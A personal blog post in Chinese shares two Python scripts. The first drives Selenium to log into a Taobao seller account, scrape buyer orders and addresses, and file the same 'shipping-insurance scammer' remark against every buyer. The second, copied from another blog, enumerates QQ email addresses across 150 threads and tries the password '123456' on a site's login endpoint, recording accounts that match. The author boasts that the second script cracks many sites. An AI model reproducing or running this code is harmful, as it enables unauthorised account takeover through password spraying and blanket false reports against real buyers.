周六的自习偷偷学了啥

爬虫之类的东西:

import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from lxml import etree

# Flat script: prompts for Taobao credentials, drives Chrome through Selenium
# to log in, scrapes the sold-items page, and for every order found opens a
# form on guimi.taobao.com and submits a fixed remark.
print('请输入账号:')
username=input()
print('请输入密码:')
password=input()
# The chromedriver location is hard-coded to a local Windows path.
driver=webdriver.Chrome(r'E:\python\chromedriver.exe')
driver.maximize_window()
# Login page; redirectURL points at the seller's sold-items list.
driver.get('https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb'
)

# JavaScript that fills two inputs by element id and clicks the submit button.
# NOTE(review): the credentials are interpolated into the JS source with
# str.format and no escaping, so a quote or backslash in either value changes
# the script text that gets executed.
js="""
  document.getElementById('TPL_username_1').value='{0}';
  document.getElementById('password-label').value='{1}';
  document.getElementById('J_SubmitStatic').click()
""".format(username,password)
driver.execute_script(js)
try:
    # Look up the slider by id, hand the result to a 400px horizontal drag,
    # wait 2 s, then run the login JavaScript a second time.
    element=driver.find_elements_by_id('nc_1_scale_text')
    ActionChains(driver).drag_and_drop_by_offset(element,400,0).perform()
    time.sleep(2)
    driver.execute_script(js)
except:
    # Bare except: every failure in the step above is reported with this one
    # message and otherwise ignored.
    print('没有开挂')
    pass
time.sleep(3)
print('开始开挂')
# Switch into the first frame of the page. This call is outside any try block,
# so an exception here ends the script without reaching driver.quit().
driver.switch_to.frame(0)
try:
    # SMS verification step: request a code, read it from stdin, submit it.
    driver.find_element_by_id('J_GetCode').click()
    print('请输入手机验证码')
    x=input()
    driver.find_element_by_id('J_Phone_Checkcode').send_keys(x)
    driver.find_element_by_id('submitBtn').click()
except Exception as e:
    # On failure print the error and stop the current page load.
    print(e)
    driver.execute_script('window.stop()')

time.sleep(3)
driver.refresh()

try:
    # Wait (timeout argument 15) until elements with id 'page' are present.
    WebDriverWait(driver,15).until(EC.presence_of_all_elements_located((By.ID,'page')))
except:
    print('over')
    driver.execute_script("window.stop()")
# Parse a snapshot of the page with lxml; the loop below reads order fields
# from this snapshot while the live browser navigates elsewhere.
html=driver.page_source
selector=etree.HTML(html)
list1=selector.xpath('//div[contains(@class,"item-mod__trade-order")]')

# The whole loop sits inside one try block, so the first exception stops the
# processing of all remaining orders; the browser is closed in `finally`.
try:
    for i in list1:
        order_id = i.xpath('table[1]/tbody/tr/td[1]/label/span[3]/text()')[0]  # order number
        order_time = i.xpath('table[1]/tbody/tr/td[1]/label/span[6]/text()')[0]  # order time
        price = i.xpath('table[2]/tbody/tr/td[2]/div/p/span[2]/text()')[0]  # price
        all_price = i.xpath('table[2]/tbody/tr/td[7]/div/div[1]/p/strong/span[2]/text()')[0]  # total price
        saler_title = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0]  # product name
        # NOTE(review): same XPath as saler_title on the line above, so `name`
        # always holds the same value as saler_title.
        name = i.xpath('table[2]/tbody/tr/td[5]/div/p[1]/a/text()')[0]  # buyer account name
        url = i.xpath('table[2]/tbody/tr/td[6]/div/div/p[1]/a/@href')[0]  # item detail URL
        # The scraped href has no scheme; prepend one before navigating.
        url = 'https:' + url
        driver.get(url)
        time.sleep(3)
        # Click the second tab of the detail panel and read the address text.
        driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/ul/li[2]/a').click()
        address=driver.find_element_by_xpath('//*[@id="detail-panel"]/div/div[4]/div/div/div[2]/div/div/div[1]/div/span[2]/span').text
        print(order_id,order_time,price,all_price,saler_title,name,address)
        ### Go to guimi and perform the operation
        driver.get('http://guimi.taobao.com')
        time.sleep(3)
        driver.find_element_by_xpath('/html/body/div[3]/div/div/a[2]').click()
        driver.find_element_by_xpath('//*[@id="J_Portal"]/div/div[1]/div[2]/a[1]').click()
        time.sleep(3)
        # Enter the order number into the form, then click through two buttons.
        driver.find_element_by_id('order.0').send_keys(order_id)
        driver.find_element_by_xpath(
            '//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div/button[4]').click()
        time.sleep(1)
        driver.find_element_by_xpath(
            '//*[@id="root"]/div/div[3]/div[3]/div[2]/div/div/div[2]/div/div[2]/button').click()
        time.sleep(1)
        target = driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[3]/div[3]/div/div[3]/textarea')
        # Scroll the textarea into view before typing into it.
        driver.execute_script("arguments[0].scrollIntoView();", target)
        # NOTE(review): the same fixed remark is submitted for every order in
        # list1; nothing in the loop checks the individual order first.
        target.send_keys('骗运费险的')
        driver.find_element_by_xpath('//*[@id="root"]/div/div[3]/div[3]/div[4]/button').click()

except Exception as e:
    # NOTE(review): `'出错拉'+e` adds a str and an exception object, which
    # raises TypeError inside this handler instead of printing the error.
    print('出错拉'+e)
finally:
    driver.quit()

利用 Selenium 模块,通过模拟的 Chrome 浏览器自动登录淘宝并移动滑块。

又由于想看老师的爬虫实战文章,被迫去网上寻找暴力破解密码的方式,找了很久终于找到了一家靠谱的——https://blog.csdn.net/dwx1005526886/article/details/80642072

import hashlib
import json
import random
import socket
import threading
import time
from threading import Lock

import requests

# Inclusive bounds of the numeric ids handed out by get_user_nbr().
user_num_low = 111111111
user_num_max = 9999999999
# Next id to hand out; shared between threads and guarded by `mutex`.
user_nbr = user_num_low

mutex = Lock()


def get_user_nbr():
    """Return the address for the current id and advance the shared counter.

    The read and the increment happen under `mutex`, so two threads never
    receive the same id. The previous code called ``mutex.acquire(3)``; the
    positional 3 binds to ``blocking`` (not ``timeout``), i.e. it already
    blocked without a time limit, which is what ``with mutex`` does too.

    Returns:
        str: ``'<id>@qq.com'`` for the id that was current before the call.
    """
    global user_nbr
    with mutex:  # released even if the body raises
        user_name = '%s%s' % (user_nbr, '@qq.com')
        user_nbr += 1
    return user_name


def user_end_judge():
    """Return True once the shared counter has moved past `user_num_max`."""
    with mutex:
        return user_nbr > user_num_max


def get_curr_user():
    """Return the address for the current id without advancing the counter."""
    with mutex:
        return '%s%s' % (user_nbr, '@qq.com')

#  

#  构造用于判断密码邮箱是否存在



# Pool of browser User-Agent strings; user_test() picks one at random for
# each request via random.choice(user_agent).
user_agent = [
    'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30',
    'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)',
    'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'
]

def save_pwd(user, pwd, desc):
    """Append one ``user / pwd / desc`` record as a line to ``resut.txt``.

    The file is opened in ``a+`` mode relative to the current working
    directory, so it is created on first use and never truncated. All three
    arguments must be ``str``; anything else raises ``TypeError`` after the
    file has been opened.
    """
    pieces = ('user:', user, '  pwd:', pwd, ' desc:', desc, '\n')
    with open("resut.txt", "a+") as out:
        out.write(''.join(pieces))

def user_test(username,password):
    """POST one email/password pair to `url` and classify the JSON reply.

    NOTE(review): this submits login attempts for arbitrary accounts. It must
    only ever be pointed at a system whose owner has authorised such testing;
    no functional changes were made to it in this review.

    Args:
        username: value sent as the ``email`` form field.
        password: value fed to ``hashlib.md5().update``; its hex digest is
            what gets sent as the ``password`` form field.

    Returns:
        False when the reply's ``message`` contains '不存在'; True otherwise
        (after the result has been written with save_pwd). Falls through and
        returns None when reading or parsing the reply raises.
    """
    resp = ""
    result = ""
    url = "http://www.k*.htm"
    pwd = password
    # `user` is assigned here but not read again in this function.
    user= username
    md = hashlib.md5()
    md.update(pwd)
    # From here on `password` holds the MD5 hex digest, not the original value.
    password =  md.hexdigest()
    data = {'email':username,'password':password}

    # Page encoding intended for decoding the Chinese text in the reply;
    # the variable is assigned but not used below.
    encoding = "gb18030"
    # Build the HTTP request headers, including a randomly chosen User-Agent.
    header = {
        "User-Agent": random.choice(user_agent),
        'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With':'XMLHttpRequest'
    }

    # One attempt plus one retry: every handler below sleeps 10 s and repeats
    # the same POST once. An exception from the retry is not caught here and
    # propagates to the caller.
    try:
        # Sets a module-level attribute on requests.adapters on every call.
        requests.adapters.DEFAULT_RETRIES = 5
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.ReadTimeout:
        print("1")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.Timeout:
        print("2")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except requests.exceptions.ConnectionError:
        print("3")
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except socket.error:
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)
    except BaseException as e:
        print(e)
        time.sleep(10)
        resp = requests.post(url, data=data, headers=header, timeout=335)

    # Sets an attribute on the response object.
    # NOTE(review): unclear whether requests reads this attribute - confirm.
    resp.keep_alive = False
    #print(resp.content)
    try:
        result = resp.content
        # The local name `json` shadows the imported json module for the rest
        # of this function.
        json = resp.json()
        print('邮箱:%s ,result:%s \n ' % (username,result))
        if (json['message'].find('不存在') > -1):
            #print('邮箱:%s 为空' % username )
            return False
        else:
            print('邮箱: %s 存在' % username)
            # `password` is the MD5 hex digest at this point (rebound above).
            save_pwd(username, password, json['message'])
            return True
    except BaseException as e:
        # Parsing failures are only printed; the function then returns None.
        print("发送错误 e: %s result:%s response code:%d" % (e, result, resp.status_code ))

 

# 好了,我们获取到邮箱之后,就是要判断密码是否正确了,由于大部分人网站登陆,还是使用弱密码,我们可以到网上找一下相关的字典库,就可以直接破解了。
# 
# 判断密码是否正确,我们只需要在判断邮箱存在之后,再加一个判断即可。

# NOTE(review): article excerpt, not runnable where it stands - it uses
# `return` outside a function, the `else` is indented deeper than its `if`,
# and `username` / `pwd` are not defined at module level. Presumably it
# illustrates a branch inside user_test(); confirm against the original
# article before relying on it.
if(json['message'].find('错误') > -1):
                print("邮箱: %s 密码: %s ,密码错误!" % (username,pwd))
                return False
            else:
                print('邮箱: %s  密码: %s ,登陆成功!' % (username, pwd))
# 由于用户和密码验证较多,单一线程工作需要较长的时间,因此我们需要用上多线程,缩短密码破解时间。


def thread_bru(): # worker-thread function
    """Worker loop: take ids from the shared counter and pass each to user_test.

    Runs until user_end_judge() reports the counter is exhausted, or until
    user_test() returns a truthy value, in which case only this thread stops.
    Every exception raised inside an iteration is printed and the loop
    continues with the next id.

    NOTE(review): only run against a system whose owner has authorised this
    kind of testing; no functional changes were made in this review.
    """
    #while not user_end_judge():pwd_queue.empty()
    while not user_end_judge():
        try:
            # The same fixed value is used for every id.
            pwd = '123456'
            user = get_user_nbr()
            #print pwd_test
            #if user_test(user, pwd_test):
            if user_test(user, pwd):
                # `result` is assigned but not read afterwards.
                result = pwd
                print ('破解 %s 成功,密码为: %s' % (user, pwd))
                break
        except BaseException as e:
            print("破解子线程错误: %s" % e)

def brute(threads, pwd_queue=None):
    """Start `threads` worker threads running thread_bru, then report progress.

    Args:
        threads: number of worker threads to start.
        pwd_queue: object whose ``qsize()`` is printed as the progress value.
            The default of None is not guarded before ``qsize()`` is called.

    The threads are started but not joined; this function returns once
    user_end_judge() becomes true.
    """
    for i in range(threads):
        t = threading.Thread(target=thread_bru)
        t.start()
        print('破解线程-->%s 启动' % t.ident)
    while (not user_end_judge()): # check whether ids remain
        # Progress line every 2 s, taken from pwd_queue.qsize().
        print('\r 进度: 当前值 %d' % pwd_queue.qsize())
        time.sleep(2)
        #print('\n破解完毕')

# Script entry point: start 150 worker threads; no pwd_queue is passed.
if __name__ == "__main__":
    brute(150)

运行之后发现并不能破解博客园的密码,不过很多其他网站的密码就可以被破解

posted @ 2019-09-07 14:17  是我,米老鼠  阅读(152)  评论(0)  编辑  收藏  举报